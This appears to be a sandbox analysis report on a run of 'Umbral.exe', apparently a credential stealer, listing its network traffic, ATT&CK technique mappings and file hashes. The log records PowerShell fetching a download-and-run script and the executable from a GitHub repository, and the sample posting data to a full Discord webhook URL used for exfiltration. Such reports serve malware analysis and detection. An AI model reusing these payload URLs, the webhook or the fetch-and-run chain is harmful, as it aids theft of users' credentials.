x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6E1DAB3E6D7F4445B4DE756D98F7F3F6 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
date: Sun, 23 Mar 2025 14:56:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 488476
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 19B654A1241941A0A24B5A4C7D3C0780 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:54Z
date: Sun, 23 Mar 2025 14:56:53 GMT
DNS

ip-api.com

Umbral.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/?fields=225545

Umbral.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 23 Mar 2025 14:56:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 191
Access-Control-Allow-Origin: *
X-Ttl: 5
X-Rl: 43
DNS

discord.com

Umbral.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.138.232
POST

https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

Umbral.exe

Remote address:

162.159.135.232:443

Request

POST /api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 969
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 23 Mar 2025 14:56:54 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1742741816
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VefvBI8vo%2BCTCJwwRHoYRN40CMrE8gDEWxqR6c3d2BGoE4YgdGJ%2FHrkVeyeqtZ7rU1t62YvcWbLVjd9GezDcuIwPLcs29WAiVbwijDVBhzD%2F55q5kWnSN0zseemq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=3b03e9c435370e07efd604dac0ad4dd686130fce-1742741814; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: _cfuvid=RGC9WzRs.sj6XETxDH2.G89R8f9fjqCmeN2pdLQzVbM-1742741814773-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 924ec7353cc763ba-LHR
POST

https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

Umbral.exe

Remote address:

162.159.135.232:443

Request

POST /api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: multipart/form-data; boundary="7b69efb4-eee6-4014-929d-fb00a166fd1a"
Host: discord.com
Cookie: __cfruid=3b03e9c435370e07efd604dac0ad4dd686130fce-1742741814; _cfuvid=RGC9WzRs.sj6XETxDH2.G89R8f9fjqCmeN2pdLQzVbM-1742741814773-0.0.1.1-604800000
Content-Length: 250
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Date: Sun, 23 Mar 2025 14:56:55 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1742741816
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UNos1Z1HJ1MTGZXn5ffEEusekaYl98s311NgsAIdlqupbxcBlYHMv9cDaWKiZ7z0S38UylXw3cMeUGe4oKj3B9p%2Bl0n8OgbF%2FztGk7JV%2FsBPzCtWFsP%2FQNzlG2%2B8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Server: cloudflare
CF-RAY: 924ec736ae3363ba-LHR

185.199.110.133:443

https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe

tls, http

powershell.exe

5.3kB
248.4kB
100
185

HTTP Request

GET https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe

HTTP Response

200
20.26.156.215:443

https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe

tls, http

powershell.exe

904 B
7.8kB
9
9

HTTP Request

GET https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe

HTTP Response

302
150.171.28.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

tls, http2

2.0kB
9.4kB
22
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

HTTP Response

204
172.217.16.227:443

https://gstatic.com/generate_204

tls, http

Umbral.exe

724 B
4.9kB
8
8

HTTP Request

GET https://gstatic.com/generate_204

HTTP Response

204
150.171.27.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

tls, http2

108.3kB
3.1MB
2267
2260

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
12
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

Umbral.exe

309 B
499 B
5
3

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
162.159.135.232:443

https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

tls, http

Umbral.exe

3.2kB
6.9kB
15
18

HTTP Request

POST https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

HTTP Response

404

HTTP Request

POST https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

HTTP Response

404

8.8.8.8:53

raw.githubusercontent.com

dns

powershell.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.108.133

185.199.111.133

185.199.109.133
8.8.8.8:53

github.com

dns

powershell.exe

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

gstatic.com

dns

Umbral.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

172.217.16.227
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

ip-api.com

dns

Umbral.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

discord.com

dns

Umbral.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.135.232

162.159.128.233

162.159.136.232

162.159.137.232

162.159.138.232

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dd928c1e05ceaeb038435bd80ae202d5

SHA1
053d18346040076a78b2b76db7fbb5d083107c6f

SHA256
ca5de962a12b1e1a3f79ad576f73c5579fe7e98a27a0fcc39f1657c62aa76581

SHA512
9039f378c7d5f37ebeff507850cc9d9d42d74252969a2dc771f6eb831c0c1f86288a16b178059b3195f8ee674ae1d934898555b80216e8f8be1bd76cc7d00575

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
88eaf43aaf449b93e958cdac1f3f5242

SHA1
f6f6c5da1ad3da543ee53344debf0c21c604a6ab

SHA256
cb7108dd71f6af89f8661c5867cfec031c22e2e6cb09108db77286a249af79bb

SHA512
83c5474afd2c078284270ece6d757830340375d5b07031f1ffe3a214dd44f1319905f286cd46cdb90bd9e3738930a1e1c08677768e67c52799bbbe4e9ea5edcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
227KB

MD5
68b35208a6ccc5cf6cfa41f86712e7ab

SHA1
34c735c3cc8fd7f9d225cd7323e5632aa772f465

SHA256
4a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279

SHA512
f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onku1wnr.edd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2912-14-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

Filesize
10.8MB

Download
memory/2912-16-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

Filesize
10.8MB

Download
memory/2912-31-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

Filesize
10.8MB

Download
memory/2912-15-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

Filesize
10.8MB

Download
memory/2912-2-0x00007FFED4D03000-0x00007FFED4D05000-memory.dmp

Filesize
8KB

Download
memory/2912-13-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

Filesize
10.8MB

Download
memory/2912-3-0x000002277FD70000-0x000002277FD92000-memory.dmp

Filesize
136KB

Download
memory/5908-30-0x000001BF93280000-0x000001BF932C0000-memory.dmp

Filesize
256KB

Download
memory/5908-55-0x000001BFAD970000-0x000001BFAD9C0000-memory.dmp

Filesize
320KB

Download
memory/5908-56-0x000001BFADA40000-0x000001BFADAB6000-memory.dmp

Filesize
472KB

Download
memory/5908-57-0x000001BF95010000-0x000001BF9502E000-memory.dmp

Filesize
120KB

Download
memory/5908-64-0x000001BF95030000-0x000001BF9503A000-memory.dmp

Filesize
40KB

Download
memory/5908-65-0x000001BFAD9E0000-0x000001BFAD9F2000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.